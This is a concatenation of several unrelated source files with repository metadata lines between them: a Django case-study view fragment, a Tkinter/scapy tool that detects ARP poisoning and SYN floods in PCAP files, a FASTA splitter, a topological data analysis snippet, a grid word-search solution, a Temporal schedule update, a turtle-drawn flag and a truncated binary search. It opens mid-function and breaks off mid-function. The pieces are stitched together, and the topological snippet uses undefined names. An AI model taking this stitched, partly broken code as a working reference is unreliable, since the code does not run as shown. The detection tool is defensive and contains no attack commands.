for organization_name in request.POST.get('organizations_additional').split(","):
organization_name = organization_name.lstrip().rstrip().capitalize()
organization, created = Organization.objects.get_or_create(name=organization_name)
OrganizationCaseStudy.objects.create(
organization=organization,
page=case_study
)
for region in request.POST.getlist('regions'):
RegionCaseStudy.objects.create(
region=Region.objects.get(id=region),
page=case_study
)
for country in request.POST.getlist('countries'):
CountryCaseStudy.objects.create(
country=Country.objects.get(id=country),
page=case_study
)
# Submit page for moderation. This requires first saving a revision.
case_study.save_revision(submitted_for_moderation=True)
# Then send the notification. Last param None means do not exclude any
# moderators from email (internally wagtail would exclude the user
# submitting from such emails, be we are submitting something from an
# anonymous user, so no one should be excluded from the email).
send_notification(case_study.get_latest_revision().id, 'submitted', None)
return HttpResponseRedirect(case_study_index.url + case_study_index.reverse_subpage('thanks'))
focus_areas = FocusArea.objects.order_by('name')
organizations = Organization.objects.order_by('name')
countries = Country.objects.order_by('name')
regions = Region.objects.order_by('name')
base_year = datetime.today().year
years = [base_year - x for x in range(0, 100)]
months = ['January', 'February', 'March', 'April',
'May', 'June', 'July', 'August',
'September', 'October', 'November', 'December']
months = [('%02d' % x, y) for x, y in list(enumerate(months, 1))] # months = [('01', 'Jan'), ('02', 'Feb')], ...
marketplace_index = MarketplaceIndexPage.objects.live()[0]
context = {
'form': form,
'flow_json_file_form': flow_json_file_form,
'focus_areas': focus_areas,
'organizations': organizations,
'years': years,
'months': months,
'countries': countries,
'regions': regions,
'case_study_index': case_study_index,
'marketplace_index': marketplace_index,
}
return render(request, 'portal_pages/case_study_page_add.html', context)
| rapidpro/rapidpro-community-portal | src/rapidpro_community_portal/apps/portal_pages/views.py | views.py | py | 12,665 | python | en | code | 18 | github-code | 90 |
22814088730 | #########################################################################################################################################
#imports
from tkinter import filedialog
from tkinter import *
from tkinter import messagebox
import tkintermapview
from PIL import ImageTk, Image
import customtkinter
import os
from scapy import *
from scapy.utils import RawPcapReader
from scapy.layers.l2 import Ether, ARP
from scapy.layers.inet import IP, TCP
import time
from datetime import datetime, timezone
import requests
#########################################################################################################################################
customtkinter.set_appearance_mode("Dark") # Modes: "System" (standard), "Dark", "Light"
customtkinter.set_default_color_theme("blue") # Themes: "blue" (standard), "green", "dark-blue"
#########################################################################################################################################
#paths + images
image_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "images")
pcap_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "pcaps")
network_home_image = customtkinter.CTkImage(Image.open(os.path.join(image_path, "network3.png")), size=(612, 181))
attack_symbol = customtkinter.CTkImage(Image.open(os.path.join(image_path, "attack_symbol.png")), size=(50, 50))
home_symbol = customtkinter.CTkImage(Image.open(os.path.join(image_path, "home_symbol.png")), size=(40, 40))
prep_symbol = customtkinter.CTkImage(Image.open(os.path.join(image_path, "prep_symbol.png")), size=(40, 40))
analysis_symbol = customtkinter.CTkImage(Image.open(os.path.join(image_path, "analysis_symbol.png")), size=(40, 40))
map_symbol = customtkinter.CTkImage(Image.open(os.path.join(image_path, "map.png")), size=(40, 40))
#########################################################################################################################################
#get ip geolocation data
def get_location(ip):
ip_address = ip
response = requests.get(f'https://ipapi.co/{ip_address}/json/').json() #request ip data
location_data = { #store data
"ip": ip_address,
"city": response.get("city"),
"region": response.get("region"),
"country": response.get("country_name"),
"latitude": response.get("latitude"),
"longitude": response.get("longitude")
}
return location_data["latitude"], location_data["longitude"] #return latitude + longitude
#########################################################################################################################################
#convert epoch to localtime
def timestamp(ts_epoch):
ts = datetime.fromtimestamp(ts_epoch).strftime('%Y-%m-%d %H:%M:%S') #epoch -> standard
return ts
#########################################################################################################################################
#process / analyse pcap file for ARP Poisoning Attack
def process_pcap_arp(file_name):
net = {"192.168.100.2":"54:52:00:12:35:00","192.168.100.8":"08:00:27:72:e3:c1","192.168.100.3":"08:00:27:73:8e:fa","192.168.100.5":"08:00:27:ad:fc:da"}
#dictionary of true ip_addr:mac_addr of machines on simulated network
#net = {"192.168.1.1":"08:00:27:5e:01:7c","192.168.1.104":"08:00:27:b8:b7:58","192.168.1.105":"08:00:27:2d:f8:5a"}
#evaluation code - activate when using public arp pcap - eval-arp
print('Analysing {}...'.format(file_name)) #Output to terminal - analysing in progress
#-------------------------------------------------------#
#initialise variables
count = 0 #packet counter
arp_pkt_counter = 0 #arp packet counter
attack = False #attack detected?
first_pkt_timestamp = None ####
pkt_number = None #
first_pkt_src = None # (meta)data display variables
first_pkt_smac = None #
first_pkt_dst = None #
first_pkt_dmac = None ####
#-------------------------------------------------------#
#iterate through packets and analyse - look for arp poisoning, store necessary data
truefileloc = os.path.join(pcap_path,file_name) #true file location - will therefore run regardless of cwd
for (pkt_data,pkt_metadata) in RawPcapReader(truefileloc): #iterate through each packet in pcap
count+=1 #packet counter
ether_pkt = Ether(pkt_data) #packet - ethernet frame
if 'type' not in ether_pkt.fields: #disregard LLC frames
continue
if ether_pkt.type != 0x0806: #disregard non-ARP packets
continue
arp_pkt = ether_pkt[ARP] #packet - ARP layer
arp_pkt_counter+=1 #arp packet counter
if arp_pkt_counter == 1: #if 1st arp packet, store data - incase of non-attack, display first packet data
detection = "No ARP Poisoning Detected\nDisplaying First ARP Data" #detection status
first_pkt_timestamp = timestamp(pkt_metadata.sec) #timestamp
pkt_number = count #packet number
first_pkt_src = ("Source IP: "+str(arp_pkt.psrc)) #source ip
first_pkt_smac = ("Source MAC: "+str(arp_pkt.hwsrc)) #source mac
first_pkt_dst = ("Destination IP: "+str(arp_pkt.pdst)) #destination ip
first_pkt_dmac = ("Destination MAC: "+str(arp_pkt.hwdst)) #destinaion mac
try:
if net[arp_pkt.psrc] != arp_pkt.hwsrc: #if mac != associated ip mac, arp poisoning detected - store data
detection = " ARP Poisoning Detected " #detection
first_pkt_timestamp = timestamp(pkt_metadata.sec) #timestamp
pkt_number = count #packet number
key = [k for k, v in net.items() if v == arp_pkt.hwsrc][0] #find true source ip - use mac to find associated ip
first_pkt_src = ("Attacker IP: "+str(key)) #attacker ip
first_pkt_smac = ("Attack MAC: "+str(arp_pkt.hwsrc)) #attacker mac
first_pkt_dst = ("Target IP: "+str(arp_pkt.pdst)) #target ip
first_pkt_dmac = ("Target MAC: "+str(arp_pkt.hwdst)) #target mac
attack = True #attack = True
break #break out of loop, attack detected, save resources
except:
print("IP Unknown")
return pkt_number, attack, first_pkt_src, first_pkt_smac, first_pkt_dst, first_pkt_dmac, first_pkt_timestamp, detection
#########################################################################################################################################
#process / analyse pcap file for SYN Attack
def process_pcap_syn(file_name):
print('Analysing {}...'.format(file_name)) #Output to terminal - analysing in progress
#-------------------------------------------------------#
#initialise variables
count = 0 #packet counter
ipv4_packet_count = 0 #ipv4 packet counter
syn = 0 #tcp syn flag counter
attack = False #attack detected?
first_atkpkt_timestamp = None ####
first_atkpkt_src = None #
first_atkpkt_sport = None #
first_atkpkt_dst = None #
first_atkpkt_dport = None #
first_atkpkt_protocol = None #
first_pkt_timestamp = None # (meta)data display variables
first_pkt_src = None #
first_pkt_sport = None #
first_pkt_dst = None #
first_pkt_dport = None #
first_pkt_protocol = None ####
#-------------------------------------------------------#
#iterate through packets and analyse - look for syn attack, store necessary data
truefileloc = os.path.join(pcap_path,file_name) #true file location - will therefore run regardless of cwd
for (pkt_data, pkt_metadata) in RawPcapReader(truefileloc): #iterate through each packet in pcap
count += 1 #packet counter
ether_pkt = Ether(pkt_data) #packet - ethernet frame
if 'type' not in ether_pkt.fields: #disregard LLC frames
continue
if ether_pkt.type != 0x0800: #disregard non-ipv4 packets
continue
ip_pkt = ether_pkt[IP] #packet - ip layer
ipv4_packet_count+=1 #ipv4 packet counter
if ipv4_packet_count == 1: #if 1st ipv4 packet, store data - incase of non-attack, display first packet data
first_pkt_timestamp = timestamp(pkt_metadata.sec) #timestamp
first_pkt_src = ip_pkt.src #source ip
first_pkt_dst = ip_pkt.dst #destination ip
first_pkt_protocol = (str(ip_pkt.layers()[1]).strip("'><.")).lstrip("class 'scapy.layers.inet.") #protocol
if ip_pkt.proto != 6: #disregard non-tcp packets
# Ignore non-TCP packet
continue
tcp_pkt = ip_pkt[TCP] #packet - tcp frame
if ipv4_packet_count == 1: #if 1st ipv4 packet, store data - incase of non-attack, can display first packet data
first_pkt_sport = tcp_pkt.sport #source port
first_pkt_dport = tcp_pkt.dport #destination port
if str(tcp_pkt.flags) == 'S': #if syn flag
syn+=1 #start / continue adding to syn counter (searching for syn attack)
else: #if not syn flag
syn=0 #reset counter
if syn==1: #if first syn flag packet, store data - incase of attack, display first attack packet data
first_atkpkt_no = count #first attack packet number (allows for further analysis with other tools if desired, can quickly find start of attack in large pcap)
first_atkpkt_timestamp = timestamp(pkt_metadata.sec) #timestamp
first_atkpkt_src = ip_pkt.src #source ip
first_atkpkt_sport = ip_pkt[TCP].sport #source port
first_atkpkt_dst = ip_pkt.dst #destination ip
first_atkpkt_dport = ip_pkt[TCP].dport #destination port
first_atkpkt_protocol = (str(ip_pkt.layers()[1]).strip("'><")).lstrip("class 'scapy.layers.inet.") #protocol
if syn>2: #if syn counter > 2 (3 syn packets in a row)
attack=True #set attack to true
break #attack found, break out of loop (save resources)
#-------------------------------------------------------#
#check attack status, return appropriate data
if attack == True: #if attack is true, return attack data
detection = "SYN Attack Detected"
src = str(first_atkpkt_src)+':'+str(first_atkpkt_sport)
dest = str(first_atkpkt_dst)+':'+str(first_atkpkt_dport)
return first_atkpkt_no, attack, src, dest, first_atkpkt_timestamp, first_atkpkt_protocol, detection
if attack == False: #if attack is not true, return first packet data
detection = "No SYN Attack Detected"
if first_pkt_sport != None: #if port data is available, send ip+port data
src = str(first_pkt_src)+':'+str(first_pkt_sport)
dest = str(first_pkt_dst)+':'+str(first_pkt_dport)
else:
src = str(first_pkt_src)+' ' #if port data is not available, send ip data
dest = str(first_pkt_dst)+' '
return count, attack, src, dest, first_pkt_timestamp, first_pkt_protocol, detection
#########################################################################################################################################
#changeframe function #1 - main frames
def changeframe(frame): #take argument, i.e framename
frame.tkraise() #raise frame
#########################################################################################################################################
#changeframe function #2 - side frames
def changeframetest(frame): #take argement- i.e framename
if frame == "home": #if frame == ...
home_frame.grid(column = 1, row=0, sticky = "nesw") #grid (display) frame
else: #if frame != ...
home_frame.grid_forget() #grid_forget (remove) frame
if frame == "prep":
prep_frame.grid(column = 1, row=0, sticky = "nesw") #
else: # #
prep_frame.grid_forget() # # #
if frame == "analysis": #
analysis_frame.grid(column = 1, row=0, sticky = "nesw") #
else: #
analysis_frame.grid_forget() #
if frame == "map": #
map_frame.grid(column = 1, row=0, sticky= "nesw") #
else: #
map_frame.grid_forget() #
#########################################################################################################################################
#import folder function / storage + attack selection storage
def importfolder():
global filename #pcap filename accessible globally
file = filedialog.askopenfilename() #open, select, store pcap filename
discard, sep, filename = file.partition('pcaps/') #dissect and store filename - remove unnecessary filepath
#print("Testing: File output -",filename) #testing purposes - test case 03-05
if filename == '': #if filename empty
import_success_label.configure(text ="Unsuccessful Import - No File Imported") #display unsuccessful import to user
else: #if filename not empty
import_success_label.configure(text='{} Successfully Imported'.format(filename)) #display filename successfully imported to user
import_success_label.grid(column=0, row=2, pady=40)
def attackselection(selection): #optionmenu command, pass in selected option
global atk_selection #attack selection accessible globally
atk_selection = selection #store selected option
#print("Attack Selected: ",atk_selection) #testing purposes - test case 06
#########################################################################################################################################
#analyse button function
def analysis():
#-------------------------------------------------------#
#validation + attack selection
try: #validation #1 - check if an attack is selected, if no error - continue
if atk_selection == "SYN Attack": #if attack selected is "SYN Attack"
try: #validation #2 - check if a file is imported, if no error - continue
pno, atk, src, dest, dt, prot, detection = process_pcap_syn(filename) #process_pcap_syn function - pass in filename, store return variables
except: #validation #2 - if error - display message box alerting user to import file
messagebox.showerror('User Error', 'Error: Import PCAP File before Analysing!')
return
elif atk_selection == "ARP Poisoning": #if attack selected is "ARP Poisoning"
try: #validation #2 - check if a file is imported, if no error - continue
pno, atk, src, smac, dst, dmac, dt, detection = process_pcap_arp(filename) #process_pcap_arp function - pass in filename, store return variables
except: #validation #2 - if error - display message box alerting user to import file
messagebox.showerror('User Error', 'Error: Import PCAP File before Analysing!')
return
except: #validation #1 - if error - display message box alerting user to select an attack
messagebox.showerror('User Error', 'Error: Select Attack before Analysing!')
return
#-------------------------------------------------------#
#configure labels on analysis to display data returned from process_pcap_? function
if atk_selection == "SYN Attack":
smac_label.grid_forget() #remove labels from possible prior analysis
dmac_label.grid_forget()
src_ip_label.configure(text='Source IP: {}'.format(src)) #alter text
src_ip_label.grid(column=0, row=0, padx=50, pady=80,ipadx=25, ipady=15) #display widget
dest_ip_label.configure(text='Destination IP: {}'.format(dest)) #
dest_ip_label.grid(column=2, row=0, padx=50, ipadx=20, ipady=15) # #
# # #
time_label.configure(text='Data / Time: {}'.format(dt)) #
time_label.grid(column=0, row=1, padx=50, ipadx=17, ipady=15) #
#
protocol_label.configure(text='Protocol: {}'.format(prot)) #
protocol_label.grid(column=2, row=1, padx=50, ipadx=68, ipady=15) #
#
detection_label.configure(text='{}'.format(detection)) #
detection_label.grid(column=1, row=3, ipadx=50, ipady=15) #
elif atk_selection == "ARP Poisoning":
protocol_label.grid_forget() #remove labels from possible prior analysis
src_ip_label.configure(text='{}'.format(src)) #alter text
src_ip_label.grid(column=0, row=0, padx=50, pady=80,ipadx=25, ipady=15) #display widget
dest_ip_label.configure(text='{}'.format(dst)) #
dest_ip_label.grid(column=2, row=0, padx=50, ipadx=20, ipady=15) # #
# # #
time_label.configure(text='Data / Time: {}'.format(dt)) #
time_label.grid(column=0, row=3, padx=50, ipadx=17, ipady=15) #
#
smac_label.configure(text='{}'.format(smac)) #
smac_label.grid(column=0, row=1, padx=50, ipadx=17, ipady=15) #
#
dmac_label.configure(text='{}'.format(dmac)) #
dmac_label.grid(column=2, row=1, padx=50, ipadx=68, ipady=15) #
#
detection_label.configure(text='{}'.format(detection)) #
detection_label.grid(column=1, row=3, ipadx=30, ipady=15) #
#-------------------------------------------------------#
#check attack status - configure detection label
if atk == True: #if attack is true
detection_label.configure(bg_color = "red") #configure label to red, display packet number (as well as detection message)
detection_label.configure(text='{}\nPacket Number: {}'.format(detection,pno))
else: #if attack is not true
detection_label.configure(bg_color = "green") #configure label to green, retain original detection message (packet number not required)
#--------------------------------------------------------#
#map markers
truesrc, sep, tail = src.partition(":") #separate return ip, store ip only (not port)
lat,long = get_location(truesrc) #get_location function - pass in ip, store latitude + longitude
#print("Latitude Data: ",lat,"\nLongitude Data: ",long) #testing purposes - test case 13-14
for marker in markers: #delete list of prior markers (from any previous analysis runs)
marker.delete()
try: #if ip contains geolocation data (returns data, doesn't error)
markers.append(map.set_marker(lat, long, text=truesrc)) #add marker to map + add text displaying ip
print("IP Avaiable for Visualisation") #output to terminal that ip is available on the map
warning_label.grid(column=2,row=3) #display warning label - ip may be spoofed, marker may not be accurate to attacker location
except: #if ip doesn't contain geolocation data (returns none, errors)
print("IP Unavailable for Visualisation") #output to terminal that ip is not available on the map
warning_label.grid_forget() #remove warning label
#-------------------------------------------------------#
#changeframe to analysis page automatically
time.sleep(1)
changeframetest("analysis")
#########################################################################################################################################
#root Tk
root = customtkinter.CTk() #root Tk frame
root.attributes('-fullscreen',False) #fullscreen = false
root.geometry("1100x580") #window size
root.title('Network Traffic Analyser') #Title
root.configure(bg='#000000') #background colour
root.rowconfigure(0, weight=1) #row + column config = 1x1
root.columnconfigure(0, weight=1)
#########################################################################################################################################
#main frame
main = customtkinter.CTkFrame(root, bg_color='#4f4c4c') #main frame
main.grid(row=0,column=0,sticky='news') #grid main frame onto root
main.grid_rowconfigure(0,weight=1) #row + column config = 2x1
main.grid_columnconfigure(1, weight=1)
#########################################################################################################################################
#navigation from - left side of main frame
navigation_frame = customtkinter.CTkFrame(main, corner_radius=0) #navigation frame
navigation_frame.grid(column=0, row=0, sticky="nesw") #grid navigation onto main
navigation_frame.grid_rowconfigure(6, weight=1) #row + column config = 1x7
#-------------------------------------------------------#
#navigation frame widgets
navigation_frame_label = customtkinter.CTkLabel(navigation_frame, text=" Attack Analysis",
image=attack_symbol, compound="left", font=customtkinter.CTkFont(size=15, weight="bold")) #title
navigation_frame_label.grid(row=0, column=0,padx=(0,20), pady=20, ipadx=20)
home_button = customtkinter.CTkButton(navigation_frame, corner_radius=0, height=40, border_spacing=10, text=" Home",
fg_color="transparent", text_color=("gray10", "gray90"), hover_color=("gray70", "gray30"), #home button
image=home_symbol, anchor="w",command=lambda:changeframetest("home"))
home_button.grid(row=1, column=0, sticky="ew")
prep_frame_button = customtkinter.CTkButton(navigation_frame, corner_radius=0, height=40, border_spacing=10, text=" Preparation",
fg_color="transparent", text_color=("gray10", "gray90"), hover_color=("gray70", "gray30"), #preparation button
image=prep_symbol, anchor="w",command=lambda:changeframetest("prep"))
prep_frame_button.grid(row=2, column=0, sticky="ew")
analysis_frame_button = customtkinter.CTkButton(navigation_frame, corner_radius=0, height=40, border_spacing=10, text=" Analysis",
fg_color="transparent", text_color=("gray10", "gray90"), hover_color=("gray70", "gray30"), #analysis button
image=analysis_symbol, anchor="w",command=lambda:changeframetest("analysis"))
analysis_frame_button.grid(row=3, column=0, sticky="ew")
map_frame_button = customtkinter.CTkButton(navigation_frame, corner_radius=0, height=40, border_spacing=10, text=" Map",
fg_color="transparent", text_color=("gray10", "gray90"), hover_color=("gray70", "gray30"), #map button
image=map_symbol, anchor="w",command=lambda:changeframetest("map"))
map_frame_button.grid(row=4, column=0, sticky="ew")
exit_button = customtkinter.CTkButton(navigation_frame, text="Exit", command=root.destroy) #exit button
exit_button.grid(row=6, column=0, padx=20, pady=20, sticky="s")
#########################################################################################################################################
#home frame - 1/4 right side of main frame
home_frame = customtkinter.CTkFrame(main, corner_radius=0, fg_color="transparent") #home frame
home_frame.grid_columnconfigure(0,weight=1) #row + column config = 1x4
home_frame.grid_rowconfigure(3,weight=1)
#-------------------------------------------------------#
#home frame widgets
home_title_label = customtkinter.CTkLabel(home_frame, text= "Network Traffic Analysis Tool", compound="left", font=customtkinter.CTkFont(size=20, weight="bold")) #title
home_title_label.grid(column=0, row=0, pady=35)
home_instructions = customtkinter.CTkTextbox(home_frame, height=230, width=500, text_color='white', activate_scrollbars=False)
home_instructions.insert("0.0", " Import and analyse network traffic, and discover attacks within packets\n\n \
Visualise important data and track potential attackers\n\n\nOn the 'Preparation' Tab:\n\n\
- Import a PCAP file\n\n - Select an attack you wish to discover\n\n - Move to the 'Analysis' Tab for results\n\n - Visuale IP's on the 'Map' Tab") #instructions
home_instructions.configure(state='disabled')
home_instructions.grid(column=0, row=1)
home_image_label = customtkinter.CTkLabel(home_frame, text="", image=network_home_image, compound="center") #image
home_image_label.grid(column=0, row=3)
#########################################################################################################################################
#prep frame - 2/4 right side of main frame
prep_frame = customtkinter.CTkFrame(main, corner_radius=0, fg_color="transparent") #prep frame
prep_frame.grid_columnconfigure(0,weight=1) #row + column config = 1x5
prep_frame.grid_rowconfigure(4,weight=1)
#-------------------------------------------------------#
#preparation frame widgets
prep_title_label = customtkinter.CTkLabel(prep_frame, text= "Preparation", compound="left", font=customtkinter.CTkFont(size=20, weight="bold"), bg_color="#222222") #title
prep_title_label.grid(column=0, row=0, pady=35, ipadx=240, ipady=18)
import_button = customtkinter.CTkButton(prep_frame, text="Import PCAP", command=importfolder) #import button
import_button.grid(column=0, row=1, pady=20)
import_success_label = customtkinter.CTkLabel(prep_frame, text='', font=customtkinter.CTkFont(size=12, weight="normal")) #import success label
attack_selection = customtkinter.CTkOptionMenu(master=prep_frame, values=["SYN Attack", "ARP Poisoning"], command = attackselection) #attack selection optionmenu
attack_selection.grid(column=0, row=3, pady=40)
attack_selection.set("Select Attack")
analyse_button = customtkinter.CTkButton(prep_frame, text="Analyse",command=analysis) #analyse button
analyse_button.grid(column=0, row=4, pady=20)
#########################################################################################################################################
#analysis frame - 3/4 right side of main frame
analysis_frame = customtkinter.CTkFrame(main, corner_radius=0, fg_color="transparent") #analysis frame
analysis_frame.grid_columnconfigure(2,weight=1) #row + column config = 3x4
analysis_frame.grid_rowconfigure(3,weight=1)
#-------------------------------------------------------#
#analysis frame widgets
src_ip_label = customtkinter.CTkLabel(analysis_frame, text= "src_ip + port", compound="none", anchor='center',
font=customtkinter.CTkFont(size=12, weight="normal"), bg_color="#202020") #src_ip - universal
dest_ip_label = customtkinter.CTkLabel(analysis_frame, text= "dest_ip + port", compound="none", anchor='center',
font=customtkinter.CTkFont(size=12, weight="normal"), bg_color="#202020") #dest_ip - universal
time_label = customtkinter.CTkLabel(analysis_frame, text= "time", compound="none", anchor='center',
font=customtkinter.CTkFont(size=12, weight="normal"), bg_color="#202020") #time - universal
protocol_label = customtkinter.CTkLabel(analysis_frame, text= "protocol", compound="none", anchor='center',
font=customtkinter.CTkFont(size=12, weight="normal"), bg_color="#202020") #protocol - syn attack
detection_label = customtkinter.CTkLabel(analysis_frame, text= "<attack> <not> detected", compound="none", anchor='center', #detection - universal
font=customtkinter.CTkFont(size=12, weight="normal"), bg_color="#202020")
warning_label = customtkinter.CTkLabel(analysis_frame, text= "*Warning - IP may be spoofed, Visualisation may be inaccurate", #map warning label
compound="none", anchor='center', font=customtkinter.CTkFont(size=10, weight="normal"),
bg_color="transparent")
smac_label = customtkinter.CTkLabel(analysis_frame, text= "smac", compound="none", anchor='center', #src_mac - arp poisoning
font=customtkinter.CTkFont(size=12, weight="normal"), bg_color="#202020")
dmac_label = customtkinter.CTkLabel(analysis_frame, text= "dmac", compound="none", anchor='center', #dst_mac - arp poisoning
font=customtkinter.CTkFont(size=12, weight="normal"), bg_color="#202020")
#########################################################################################################################################
#map frame - 4/4 right side of main frame
map_frame = customtkinter.CTkFrame(main, corner_radius=0, fg_color="transparent") #map frame
map_frame.grid_columnconfigure(0,weight=1) #row + column config = 1x1
map_frame.grid_rowconfigure(0,weight=1)
#-------------------------------------------------------#
#map frame widgets
markers = [] #array of map markers
map = tkintermapview.TkinterMapView(map_frame, width=880, height=700, corner_radius=0) #map
map.set_tile_server("https://mt0.google.com/vt/lyrs=m&hl=en&x={x}&y={y}&z={z}&s=Ga", max_zoom=22) #map type = googlemaps
map.set_address("Europe") #intial address = Europe
map.set_zoom(1) #zoom = 1, view world map
map.grid(column=0, row=0) #grid map onto map_frame
#########################################################################################################################################
#entrypoint / start
changeframe(main) #initialise / changeframe to main
root.mainloop() #gui continuation
| LHM2/PCAP_Analysis_Tool | project.py | project.py | py | 37,694 | python | en | code | 0 | github-code | 90 |
70211260137 | import pprint
import re
import sys
"""
File takes a fasta files and a path and outputs each sequence in it's
own file
# python split_fasta.py [FILE] [PATH]
"""
print("Usage: > python split_fasta.py [FASTA FILE] [PATH]")
header = ""
seq = ""
uniref_id = ""
# pattern = re.compile("^>.+?\|(.+?)\|.+?\s")
pattern = re.compile("^>(.+?)\s+")
with open(sys.argv[1]) as infile:
for line in infile:
# line = line.strip()
if line.startswith(">"):
if len(uniref_id) is not 0:
out = open(sys.argv[2]+"/"+uniref_id+".fasta", "w")
out.write(header)
out.write(seq)
out.close()
seq = ""
header = ""
header = line
m = pattern.match(line)
uniref_id = m.group(1)
else:
seq += line
| DanBuchan/bin_tools | split_fasta.py | split_fasta.py | py | 850 | python | en | code | 0 | github-code | 90 |
34049029755 | hist_file="history_wrists" #nov 13
hist_wrist = load_file(hist_file)
# manually random split
dataset, users, activities, raw_files = hist_wrist['_1.mp4']
dataset2, users2, activities2, raw_files2 = hist_wrist['_2.mkv']
dataset3, users3, activities3, raw_files3 = hist_wrist['_3.mp4']
# create point cloud array
pt_cloud_array = []
nrows = 100
for i in range(nrows):
series = dataset[i]
x_ser = series[::3]
y_ser = series[1::3]
z_ser = series[2::3]
pt_cloud_current = np.stack((x_ser, y_ser, z_ser), axis=-1)
pt_cloud_array.append(pt_cloud_current)
# print shape
print(np.shape(pt_cloud_array))
# plot one of its rows
pt_cloud = pt_cloud_array[1]
plot_point_cloud(pt_cloud)
# fit
from gtda.homology import VietorisRipsPersistence
# Track connected components, loops, and voids
homology_dimensions = [0, 1, 2]
# Collapse edges to speed up H2 persistence calculation!
persistence = VietorisRipsPersistence(
metric="euclidean",
homology_dimensions=homology_dimensions,
n_jobs=6,
collapse_edges=True,
)
diagrams_basic = persistence.fit_transform(pt_cloud_array)
# plot
from gtda.plotting import plot_diagram
# Circle
plot_diagram(diagrams_basic[0])
# map to less # of pts
from gtda.diagrams import PersistenceEntropy
persistence_entropy = PersistenceEntropy()
# calculate topological feature matrix
X_basic = persistence_entropy.fit_transform(diagrams_basic)
# expect shape - (n_point_clouds, n_homology_dims)
print(X_basic.shape)
# train classifier, evaluate on same set
from sklearn.ensemble import RandomForestClassifier
rf = RandomForestClassifier(oob_score=True)
rf.fit(X_basic, activities100)
print(f"OOB score: {rf.oob_score_:.3f}")
| sy2657/activity_recognition | topological/preprocess_and_fit_data.py | preprocess_and_fit_data.py | py | 1,705 | python | en | code | 0 | github-code | 90 |
72495849578 | from collections import deque
from copy import copy
import pytest
class Solution:
def exist(self, board, word):
"""
:type board: List[List[str]]
:type word: str
:rtype: bool
"""
if not word:
return False
for i, row in enumerate(board):
for j in range(len(row)):
if self.search_from_letter((i, j), board, word):
return True
return False
def search_from_letter(self, coordinates, grid, word, visited=None):
if visited is None:
visited = set()
if grid[coordinates[0]][coordinates[1]] != word[0]:
return False
elif len(word) == 1:
return True
visited.add(coordinates)
for neighbour in ((0, 1), (0, -1), (-1, 0), (1, 0)):
neighbour = (coordinates[0] + neighbour[0], coordinates[1] + neighbour[1])
if (
0 <= neighbour[0] < len(grid)
and 0 <= neighbour[1] < len(grid[0])
and neighbour not in visited
):
if self.search_from_letter(
neighbour, grid, word[1:], visited=copy(visited)
):
return True
return False
@pytest.mark.parametrize(
"board,word,expected",
[
(
[["A", "B", "C", "E"], ["S", "F", "C", "S"], ["A", "D", "E", "E"]],
"ABCCED",
True,
),
([["a", "a"]], "aaa", False),
],
)
def tests_a(board, word, expected):
assert Solution().exist(board, word) == expected
| enanablancaynumeros/interview_exercises | string_exist_in_grid.py | string_exist_in_grid.py | py | 1,616 | python | en | code | 0 | github-code | 90 |
2939144859 | import asyncio
from temporalio.client import (
Client,
ScheduleActionStartWorkflow,
ScheduleUpdate,
ScheduleUpdateInput,
)
async def main():
client = await Client.connect("localhost:7233")
handle = client.get_schedule_handle(
"workflow-schedule-id",
)
async def update_schedule_simple(input: ScheduleUpdateInput) -> ScheduleUpdate:
schedule_action = input.description.schedule.action
if isinstance(schedule_action, ScheduleActionStartWorkflow):
schedule_action.args = ["my new schedule arg"]
return ScheduleUpdate(schedule=input.description.schedule)
await handle.update(update_schedule_simple)
if __name__ == "__main__":
asyncio.run(main())
| temporalio/samples-python | schedules/update_schedule.py | update_schedule.py | py | 734 | python | en | code | 68 | github-code | 90 |
8620370984 | #Nikhil Vemula
#Feb 16 2016
#CS61002 Algorithm & Programming 1
#American flag in turtle.py
import turtle #To use graphics
#WIKIPEDIA INFO
'''Hoist (width) of flag: A = 1.0
Fly (length) of flag: B = 1.9
Hoist (width) of Union: C = 0.5385 (7/13)
Fly (length) of Union: D = 0.76
E = F = 0.054
G = H = 0.063
Diameter of star: K = 0.0616
Width of stripe: L = 0.0769 (1/13)
'''
#function to determine rgb colors
def get_color(color):
r=0
b=0
g=0
if color=='red':
r=1
b=0
c=0
elif color=='green':
r=0
b=0
g=1
elif color=='blue':
r=0
b=1
g=0
elif color=='white':
r=1
b=1
g=1
elif color=='black':
r=0
b=0
g=0
return r,g,b
#function to draw rectangle
def draw_rectangle(length,height,color):
turtle.up()
turtle.speed(1000)
r,g,b = get_color(color)
turtle.color(r,g,b)
turtle.begin_fill()
turtle.setpos(-150,150)
turtle.down()
turtle.forward(length)
turtle.right(90)
turtle.forward(height)
turtle.right(90)
turtle.forward(length)
turtle.right(90)
turtle.forward(height)
turtle.end_fill()
starbox_height = height*0.5385
starbox_width = (length*0.76)/2
redStripes_height = float(round(height/13,1))
newyPos = 150-redStripes_height
for i in range(1,14):
turtle.setpos(-150,newyPos)
if i%2!=0:
r,g,b = get_color('white')
turtle.color(r,g,b)
turtle.begin_fill()
turtle.right(90)
turtle.forward(length)
turtle.right(90)
turtle.forward(redStripes_height)
turtle.right(90)
turtle.forward(length)
turtle.right(90)
turtle.forward(redStripes_height)
turtle.end_fill()
else:
r,g,b=get_color('red')
newyPos = newyPos - redStripes_height
r,g,b = get_color('blue')
turtle.setpos(-150,150)
turtle.color(r,g,b)
turtle.begin_fill()
turtle.up()
turtle.right(90)
turtle.forward(starbox_width)
turtle.right(90)
turtle.forward(starbox_height)
turtle.right(90)
turtle.forward(starbox_width)
turtle.right(90)
turtle.forward(starbox_height)
turtle.end_fill()
createstar()
def createstar():
size =8
defxpos = -135
defypos = 135
for j in range(0,5):
defxpos = -135
for i in range(0,6):
draw_star(size,'white',defxpos,defypos)
defxpos = defxpos+22
defypos = defypos-21
defxpos = -135
defypos = 125.5
for j in range(0,4):
defxpos = -124
for i in range(0,5):
draw_star(size,'white',defxpos,defypos)
defxpos = defxpos+22
defypos = defypos-21
turtle.up()
turtle.goto(-200,200)
#function to draw a star
def draw_star(size,color,xpos,ypos):
turtle.up()
r,g,b = get_color(color)
turtle.color(r,g,b)
turtle.setpos(xpos,ypos)
turtle.begin_fill()
turtle.down()
for i in range(0,5):
turtle.forward(size)
turtle.left(144)
turtle.end_fill()
#function to draw a flag
def draw_flag(height):
draw_rectangle(height*1.9,height,'red')
draw_flag(1.0*200)
| radam0/Python | CS61002 Labs/Lab04.py | Lab04.py | py | 3,441 | python | en | code | 0 | github-code | 90 |
39304251409 | #binary search is better than linear search when the list of elements are more. in case of binary search we must have the elements in sorted order
def Bsearch(lst,n):
l=0
u=len(lst)-1
while l<=u:
mid=(l+u)//2
if lst[mid]==n:
